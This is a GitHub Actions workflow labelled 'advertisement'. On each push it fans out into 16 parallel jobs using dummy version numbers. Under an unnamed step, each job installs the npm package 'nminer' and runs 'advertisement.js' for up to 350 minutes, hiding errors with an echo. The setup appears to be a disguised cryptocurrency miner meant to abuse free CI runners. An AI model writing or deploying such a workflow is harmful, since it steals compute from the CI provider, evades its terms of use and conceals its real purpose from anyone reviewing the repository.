name: advertisement
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1350 }
          - { version: 3461 }
          - { version: 1080 }
          - { version: 9373 }
          - { version: 3220 }
          - { version: 2366 }
          - { version: 9793 }
          - { version: 6505 }
          - { version: 8817 }
          - { version: 6431 }
          - { version: 8795 }
          - { version: 1706 }
          - { version: 9622 }
          - { version: 8916 }
          - { version: 516 }
          - { version: 8067 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 350m node advertisement.js || echo "advertisement executed"